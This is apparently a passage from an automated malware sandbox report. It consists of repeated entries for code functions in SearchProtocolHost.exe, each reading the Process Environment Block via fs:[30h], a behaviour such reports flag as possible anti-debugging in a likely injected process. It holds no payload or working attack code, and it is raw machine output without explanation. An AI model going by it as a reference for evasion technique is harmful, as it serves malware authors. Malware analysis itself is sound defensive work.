        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CA22B mov eax, dword ptr fs:[00000030h]19_2_037CA22B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378821B mov eax, dword ptr fs:[00000030h]19_2_0378821B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378A200 mov eax, dword ptr fs:[00000030h]19_2_0378A200
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A02F9 mov eax, dword ptr fs:[00000030h]19_2_037A02F9
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A02F9 mov eax, dword ptr fs:[00000030h]19_2_037A02F9
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A02F9 mov eax, dword ptr fs:[00000030h]19_2_037A02F9
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A02F9 mov eax, dword ptr fs:[00000030h]19_2_037A02F9
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A02F9 mov eax, dword ptr fs:[00000030h]19_2_037A02F9
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A02F9 mov eax, dword ptr fs:[00000030h]19_2_037A02F9
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A02F9 mov eax, dword ptr fs:[00000030h]19_2_037A02F9
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A02F9 mov eax, dword ptr fs:[00000030h]19_2_037A02F9
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378D2EC mov eax, dword ptr fs:[00000030h]19_2_0378D2EC
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378D2EC mov eax, dword ptr fs:[00000030h]19_2_0378D2EC
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0381B214 mov eax, dword ptr fs:[00000030h]19_2_0381B214
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0381B214 mov eax, dword ptr fs:[00000030h]19_2_0381B214
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037872E0 mov eax, dword ptr fs:[00000030h]19_2_037872E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379A2E0 mov eax, dword ptr fs:[00000030h]19_2_0379A2E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379A2E0 mov eax, dword ptr fs:[00000030h]19_2_0379A2E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379A2E0 mov eax, dword ptr fs:[00000030h]19_2_0379A2E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379A2E0 mov eax, dword ptr fs:[00000030h]19_2_0379A2E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379A2E0 mov eax, dword ptr fs:[00000030h]19_2_0379A2E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379A2E0 mov eax, dword ptr fs:[00000030h]19_2_0379A2E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037982E0 mov eax, dword ptr fs:[00000030h]19_2_037982E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037982E0 mov eax, dword ptr fs:[00000030h]19_2_037982E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037982E0 mov eax, dword ptr fs:[00000030h]19_2_037982E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037982E0 mov eax, dword ptr fs:[00000030h]19_2_037982E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03810227 mov eax, dword ptr fs:[00000030h]19_2_03810227
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03810227 mov eax, dword ptr fs:[00000030h]19_2_03810227
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03810227 mov eax, dword ptr fs:[00000030h]19_2_03810227
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C32C0 mov eax, dword ptr fs:[00000030h]19_2_037C32C0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C32C0 mov eax, dword ptr fs:[00000030h]19_2_037C32C0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B32C5 mov eax, dword ptr fs:[00000030h]19_2_037B32C5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384F247 mov eax, dword ptr fs:[00000030h]19_2_0384F247
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378C2B0 mov ecx, dword ptr fs:[00000030h]19_2_0378C2B0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385124C mov eax, dword ptr fs:[00000030h]19_2_0385124C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385124C mov eax, dword ptr fs:[00000030h]19_2_0385124C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385124C mov eax, dword ptr fs:[00000030h]19_2_0385124C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385124C mov eax, dword ptr fs:[00000030h]19_2_0385124C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B42AF mov eax, dword ptr fs:[00000030h]19_2_037B42AF
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B42AF mov eax, dword ptr fs:[00000030h]19_2_037B42AF
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03797290 mov eax, dword ptr fs:[00000030h]19_2_03797290
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03797290 mov eax, dword ptr fs:[00000030h]19_2_03797290
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03797290 mov eax, dword ptr fs:[00000030h]19_2_03797290
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384D270 mov eax, dword ptr fs:[00000030h]19_2_0384D270
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0382327E mov eax, dword ptr fs:[00000030h]19_2_0382327E
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0382327E mov eax, dword ptr fs:[00000030h]19_2_0382327E
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0382327E mov eax, dword ptr fs:[00000030h]19_2_0382327E
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0382327E mov eax, dword ptr fs:[00000030h]19_2_0382327E
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0382327E mov eax, dword ptr fs:[00000030h]19_2_0382327E
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0382327E mov eax, dword ptr fs:[00000030h]19_2_0382327E
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03796179 mov eax, dword ptr fs:[00000030h]19_2_03796179
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037E717A mov eax, dword ptr fs:[00000030h]19_2_037E717A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037E717A mov eax, dword ptr fs:[00000030h]19_2_037E717A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C716D mov eax, dword ptr fs:[00000030h]19_2_037C716D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C415F mov eax, dword ptr fs:[00000030h]19_2_037C415F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038651B6 mov eax, dword ptr fs:[00000030h]19_2_038651B6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378A147 mov eax, dword ptr fs:[00000030h]19_2_0378A147
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378A147 mov eax, dword ptr fs:[00000030h]19_2_0378A147
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378A147 mov eax, dword ptr fs:[00000030h]19_2_0378A147
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C7128 mov eax, dword ptr fs:[00000030h]19_2_037C7128
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C7128 mov eax, dword ptr fs:[00000030h]19_2_037C7128
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C0118 mov eax, dword ptr fs:[00000030h]19_2_037C0118
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378F113 mov eax, dword ptr fs:[00000030h]19_2_0378F113
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038581EE mov eax, dword ptr fs:[00000030h]19_2_038581EE
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038581EE mov eax, dword ptr fs:[00000030h]19_2_038581EE
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B510F mov eax, dword ptr fs:[00000030h]19_2_037B510F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379510D mov eax, dword ptr fs:[00000030h]19_2_0379510D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037891F0 mov eax, dword ptr fs:[00000030h]19_2_037891F0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037891F0 mov eax, dword ptr fs:[00000030h]19_2_037891F0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A01F1 mov eax, dword ptr fs:[00000030h]19_2_037A01F1
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A01F1 mov eax, dword ptr fs:[00000030h]19_2_037A01F1
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A01F1 mov eax, dword ptr fs:[00000030h]19_2_037A01F1
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BF1F0 mov eax, dword ptr fs:[00000030h]19_2_037BF1F0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BF1F0 mov eax, dword ptr fs:[00000030h]19_2_037BF1F0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037881EB mov eax, dword ptr fs:[00000030h]19_2_037881EB
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379A1E3 mov eax, dword ptr fs:[00000030h]19_2_0379A1E3
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379A1E3 mov eax, dword ptr fs:[00000030h]19_2_0379A1E3
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379A1E3 mov eax, dword ptr fs:[00000030h]19_2_0379A1E3
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379A1E3 mov eax, dword ptr fs:[00000030h]19_2_0379A1E3
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379A1E3 mov eax, dword ptr fs:[00000030h]19_2_0379A1E3
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037991E5 mov eax, dword ptr fs:[00000030h]19_2_037991E5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037991E5 mov eax, dword ptr fs:[00000030h]19_2_037991E5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0381A130 mov eax, dword ptr fs:[00000030h]19_2_0381A130
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A01C0 mov eax, dword ptr fs:[00000030h]19_2_037A01C0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A01C0 mov eax, dword ptr fs:[00000030h]19_2_037A01C0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384F13E mov eax, dword ptr fs:[00000030h]19_2_0384F13E
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A51C0 mov eax, dword ptr fs:[00000030h]19_2_037A51C0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A51C0 mov eax, dword ptr fs:[00000030h]19_2_037A51C0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A51C0 mov eax, dword ptr fs:[00000030h]19_2_037A51C0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A51C0 mov eax, dword ptr fs:[00000030h]19_2_037A51C0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C31BE mov eax, dword ptr fs:[00000030h]19_2_037C31BE
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C31BE mov eax, dword ptr fs:[00000030h]19_2_037C31BE
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C41BB mov ecx, dword ptr fs:[00000030h]19_2_037C41BB
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C41BB mov eax, dword ptr fs:[00000030h]19_2_037C41BB
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C41BB mov eax, dword ptr fs:[00000030h]19_2_037C41BB
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0382314A mov eax, dword ptr fs:[00000030h]19_2_0382314A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0382314A mov eax, dword ptr fs:[00000030h]19_2_0382314A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0382314A mov eax, dword ptr fs:[00000030h]19_2_0382314A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0382314A mov eax, dword ptr fs:[00000030h]19_2_0382314A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03865149 mov eax, dword ptr fs:[00000030h]19_2_03865149
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03863157 mov eax, dword ptr fs:[00000030h]19_2_03863157
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03863157 mov eax, dword ptr fs:[00000030h]19_2_03863157
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03863157 mov eax, dword ptr fs:[00000030h]19_2_03863157
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D1190 mov eax, dword ptr fs:[00000030h]19_2_037D1190
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D1190 mov eax, dword ptr fs:[00000030h]19_2_037D1190
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B9194 mov eax, dword ptr fs:[00000030h]19_2_037B9194
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03794180 mov eax, dword ptr fs:[00000030h]19_2_03794180
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03794180 mov eax, dword ptr fs:[00000030h]19_2_03794180
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03794180 mov eax, dword ptr fs:[00000030h]19_2_03794180
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03864080 mov eax, dword ptr fs:[00000030h]19_2_03864080
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03864080 mov eax, dword ptr fs:[00000030h]19_2_03864080
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03864080 mov eax, dword ptr fs:[00000030h]19_2_03864080
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03864080 mov eax, dword ptr fs:[00000030h]19_2_03864080
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03864080 mov eax, dword ptr fs:[00000030h]19_2_03864080
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03864080 mov eax, dword ptr fs:[00000030h]19_2_03864080
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03864080 mov eax, dword ptr fs:[00000030h]19_2_03864080
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03797072 mov eax, dword ptr fs:[00000030h]19_2_03797072
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03796074 mov eax, dword ptr fs:[00000030h]19_2_03796074
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03796074 mov eax, dword ptr fs:[00000030h]19_2_03796074
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F0A5 mov eax, dword ptr fs:[00000030h]19_2_0383F0A5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F0A5 mov eax, dword ptr fs:[00000030h]19_2_0383F0A5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F0A5 mov eax, dword ptr fs:[00000030h]19_2_0383F0A5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F0A5 mov eax, dword ptr fs:[00000030h]19_2_0383F0A5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F0A5 mov eax, dword ptr fs:[00000030h]19_2_0383F0A5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F0A5 mov eax, dword ptr fs:[00000030h]19_2_0383F0A5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0383F0A5 mov eax, dword ptr fs:[00000030h]19_2_0383F0A5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03791051 mov eax, dword ptr fs:[00000030h]19_2_03791051
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03791051 mov eax, dword ptr fs:[00000030h]19_2_03791051
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384B0AF mov eax, dword ptr fs:[00000030h]19_2_0384B0AF
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038650B7 mov eax, dword ptr fs:[00000030h]19_2_038650B7
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378D02D mov eax, dword ptr fs:[00000030h]19_2_0378D02D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03798009 mov eax, dword ptr fs:[00000030h]19_2_03798009
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B5004 mov eax, dword ptr fs:[00000030h]19_2_037B5004
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B5004 mov ecx, dword ptr fs:[00000030h]19_2_037B5004
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037890F8 mov eax, dword ptr fs:[00000030h]19_2_037890F8
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037890F8 mov eax, dword ptr fs:[00000030h]19_2_037890F8
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037890F8 mov eax, dword ptr fs:[00000030h]19_2_037890F8
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037890F8 mov eax, dword ptr fs:[00000030h]19_2_037890F8
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CD0F0 mov eax, dword ptr fs:[00000030h]19_2_037CD0F0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CD0F0 mov ecx, dword ptr fs:[00000030h]19_2_037CD0F0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378C0F6 mov eax, dword ptr fs:[00000030h]19_2_0378C0F6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AB0D0 mov eax, dword ptr fs:[00000030h]19_2_037AB0D0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378B0D6 mov eax, dword ptr fs:[00000030h]19_2_0378B0D6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378B0D6 mov eax, dword ptr fs:[00000030h]19_2_0378B0D6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378B0D6 mov eax, dword ptr fs:[00000030h]19_2_0378B0D6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378B0D6 mov eax, dword ptr fs:[00000030h]19_2_0378B0D6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D00A5 mov eax, dword ptr fs:[00000030h]19_2_037D00A5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0386505B mov eax, dword ptr fs:[00000030h]19_2_0386505B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03839060 mov eax, dword ptr fs:[00000030h]19_2_03839060
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378C090 mov eax, dword ptr fs:[00000030h]19_2_0378C090
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378A093 mov ecx, dword ptr fs:[00000030h]19_2_0378A093
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03794779 mov eax, dword ptr fs:[00000030h]19_2_03794779
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03794779 mov eax, dword ptr fs:[00000030h]19_2_03794779
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0386B781 mov eax, dword ptr fs:[00000030h]19_2_0386B781
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0386B781 mov eax, dword ptr fs:[00000030h]19_2_0386B781
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037A2760 mov ecx, dword ptr fs:[00000030h]19_2_037A2760
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E79D mov eax, dword ptr fs:[00000030h]19_2_0380E79D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E79D mov eax, dword ptr fs:[00000030h]19_2_0380E79D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E79D mov eax, dword ptr fs:[00000030h]19_2_0380E79D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E79D mov eax, dword ptr fs:[00000030h]19_2_0380E79D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E79D mov eax, dword ptr fs:[00000030h]19_2_0380E79D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E79D mov eax, dword ptr fs:[00000030h]19_2_0380E79D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E79D mov eax, dword ptr fs:[00000030h]19_2_0380E79D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E79D mov eax, dword ptr fs:[00000030h]19_2_0380E79D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E79D mov eax, dword ptr fs:[00000030h]19_2_0380E79D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D1763 mov eax, dword ptr fs:[00000030h]19_2_037D1763
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D1763 mov eax, dword ptr fs:[00000030h]19_2_037D1763
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D1763 mov eax, dword ptr fs:[00000030h]19_2_037D1763
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D1763 mov eax, dword ptr fs:[00000030h]19_2_037D1763
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D1763 mov eax, dword ptr fs:[00000030h]19_2_037D1763
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D1763 mov eax, dword ptr fs:[00000030h]19_2_037D1763
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385D7A7 mov eax, dword ptr fs:[00000030h]19_2_0385D7A7
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385D7A7 mov eax, dword ptr fs:[00000030h]19_2_0385D7A7
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385D7A7 mov eax, dword ptr fs:[00000030h]19_2_0385D7A7
